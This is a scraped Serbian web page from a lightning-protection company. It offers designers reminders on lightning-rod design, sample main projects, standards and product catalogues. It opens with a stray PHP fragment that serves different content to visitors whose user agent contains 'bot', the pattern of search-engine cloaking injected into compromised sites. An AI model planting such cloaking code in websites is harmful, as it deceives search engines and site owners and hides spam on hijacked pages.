$tmp = "?" . strtolower($_SERVER['HTTP_USER_AGENT']); if((strpos($tmp, 'bot') == true)){ echo ' ?>

Vodič za projektante


 

 Na ovoj stranici pružamo projektantima sve neophodne podatke i parametre da vrlo brzo projektuju gromobranske instalacije. Da bih dobili pristup podacima, potrebno je preko sajta www.inzenjer.rs dobiti pristupnu šifru. Takođe na datom sajtu dobijate mogućnost prijave projekta u svojstvu našeg saradnika.

 

 

Kratak podsetnik na projektovanje gromobrana sa ranim startovanjem, možete pogledati ovde. Ako projektujete klasičnu gromobransku instalaciju i treba Vam podsetnik, on se nalazi na sledećem linku. Ako projektujete zaštitu kontejnera ili sličnih objekata - način na koji treba upotrebiti Franklinov štap pogledajte ovde.

Naravno,gornji primeri služe za podsećanje osnovnih principa proračuna gromobranske zaštite. Za svoje saradnike obezbedili smo na nekoliko stotina stranica na srpskom jeziku sve što je neophodno za projektovanje bilo kog tipa gromobranske zaštite:

                     -    zakonske osnove

Često nam je potrebno da vrlo brzo odredimo poluprečnik zaštite gromobrana sa ranim startovanjem. Iskoristite sledeći jednostavan proračun u excelu da za par sekundi odredite poluprečnik zaštite:

                    -    Određivanje štićenog prostora

Prilikom projektovanja nam puno pomaže ako imamo sličan projekat. Iz tog razloga uz pomoć šifre preuzmite dva tipična projekta:

                             -   Glavni projekat gromobrana sa Franklinovim stapom 

                             -   Glavni projekat gromobr ana sa ranim startovanjem 

Takođe, ako ste nadzor nad radovima, dobro će Vam doći i primerak stručnog mišljenja o gromobranskom uzemljenju.

                             -    S tručni nalaz 

I na kraju, da bi prijavili projekat, preporuka za izbor opreme je sledeća:

                            -   Tehničke karakteristike gromobrana sa ranim startovanjem

                            -   Sertifikat gromobrana o ispunjenosti standarda

                            -   Cenovnik gromobrana sa ranim startovanjem

                            -   Kompletan katalog gromobranske zaštite na srpskom jeziku     

Radnici postavljaju gromobran - Rudarsko geoloski fakultet           

Izvođenje radova gromobranske zaštite na rudarsko-geološkom fakultetu
Dokumenti:

Srpski standard gromobranske instalacije (709 kB)
Stapne hvataljke sa kružnim prstenom (89 kB)
Stapne hvataljke sa uredjajem za rano startovanje (143 kB)
Glavni projekat gromobrana sa Franklinovim stapom (1164 kB)
Glavni projekat gromobrana sa ranim startovanjem (1056 kB)
Strucni nalaz (1067 kB)
LOGIN
niste ulogovani
e-mail adresa:
lozinka:

Zaboravili ste lozinku?   

PRETRAŽIVAČ
Unesite reč ili frazu:

NEWSLETTER
Unesite Vašu Email adresu:

TESLA SISTEMI
Ekipa na terenu

 


 

 


SUPERBRANDS
Pogledajte fotografije i video sa svečane dodele nagrada »

KATALOG
Pogledajte katalog Tesla sistema »

ISO 9001

 

 

ISO 14001

 

 

ISO 18001

 

 

ISO 20000

 

 

ISO 22301

 

 

ISO 27001

 

 

ISO 50001

 

 

ISO 37001

 

 


NIKOLA TESLA
www.tesla-museum.org »